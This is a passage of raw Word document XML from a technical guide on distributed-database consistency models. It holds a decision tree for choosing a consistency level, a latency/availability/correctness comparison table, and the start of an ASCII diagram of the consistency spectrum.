        <w:pict w14:anchorId="64782C57">
          <v:rect id="_x0000_i6046" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAD63C6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Practical Decision Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD97188" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.1 Choosing Consistency Level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E536A4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6DE8F4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Decision tree:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328E9509" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="22F83D2F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>1. Can the operation result in financial loss if stale?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284FEF6B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   YES → Strong consistency (bank transfer, payment, inventory at checkout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA0B051" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   NO → Continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3898E21A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="5C26CEA5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>2. Would stale data cause user confusion (editing own content)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D2698E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   YES → Read-your-writes consistency (profile edits, document saves)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E284FB7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   NO → Continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B87053C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="75E09BE5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>3. Would stale data violate causality (seeing reply before post)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C99CDF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   YES → Causal consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0593FA72" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   NO → Continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FB9C51" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="07A88C0C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>4. Is the data time-sensitive (stock prices, live scores)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681159CF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   YES → Bounded staleness (max N seconds old)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAF55E7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   NO → Continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7F7AD9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="4E98C174" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>5. Is the data supplementary (recommendations, analytics, counts)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55426B43" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   YES → Eventual consistency (cheapest, fastest, simplest)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7019C74C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.2 The Cost-Benefit Summary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13"/>
        <w:gridCol w:w="1647"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2205"/>
        <w:gridCol w:w="1985"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="13E8979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FFA646" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C5B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Model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9A820E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C5B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Latency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7C1685" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C5B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Availability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78D871" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C5B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Correctness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141EA5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C5B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="480A6D2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0CCBEE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Strong (linearizable)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F85342" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Highest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9EF71A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Lowest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7A580B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Perfect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906F4C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>High (consensus)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="06CA0AB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0A7A5C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Sequential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050BAA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>High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9D5657" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Low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0642CA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Very good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3D0A88" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="544E60D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0A5D36" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Causal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A699B6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Moderate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63C4B1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Moderate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7D9197" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Good (preserves causality)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473F25" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Moderate (vector clocks)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="58DD76B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E6997C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:lastRenderedPageBreak/>
              <w:t>Read-your-writes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9B0169" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Low (for own writes)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921168" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>High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B28AC9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Acceptable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833037" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="2171A87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20F273" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Monotonic reads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01EBAF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Low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BB8478" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>High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D5DF02" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Acceptable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D953D2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Low (session pinning)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="001850F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596701" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Eventual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D14F8E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Lowest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E5CB49" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Highest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B47B0C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Weakest (temporary staleness)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E158CC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Lowest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FE7F3AB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:pict w14:anchorId="7149E031">
          <v:rect id="_x0000_i6047" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="407BC755" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. Summary — The Complete Mental Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679AD1AE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396AFD31" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>┌──────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588019BD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>│                    THE CONSISTENCY SPECTRUM                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456858CD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>│                                                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2394F3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">│  Strong </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>◄</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>►</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve"> Eventual   </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23161E5F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>│                                                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2297F22A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>│  All nodes agree              Only ONE node                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A31EBF5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>│  immediately                  has latest data                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2835E069" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>│                                                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EEDDC8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>│  ┌──────────┐  ┌──────────┐  ┌──────────┐  ┌──────────────────┐ │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BF1FFE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>│  │Linearize │  │ Causal   │  │Read-your │  │   Eventual       │ │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3B210C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>│  │          │  │          │  │-writes   │  │                  │ │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796FB806" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>│  │"As if    │  │"Effects  │  │"See own  │  │"Eventually       │ │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF3C93F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>│  │ one copy"│  │ after    │  │ changes" │  │  all agree"      │ │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7C5486" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>│  │          │  │ causes"  │  │          │  │                  │ │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C35BF7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>│  └──────────┘  └──────────┘  └──────────┘  └──────────────────┘ │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ABF0EB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t>│                                                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44462736" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">│  Higher latency </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>◄</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>►</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve"> Lower latency        </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525B132A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">│  Lower availability </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>◄</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>►</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve"> Higher availability   </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFB1637" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">│  Lower throughput </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>◄</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>►</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve"> Higher throughput      </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8FFB4B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>│                                                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A858BD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>│  Use for: money,     Use for: social   Use for: UX    Use for:    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10614B77" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>│  locks, inventory    feeds, collab     after edits    analytics,  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F98D0FE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
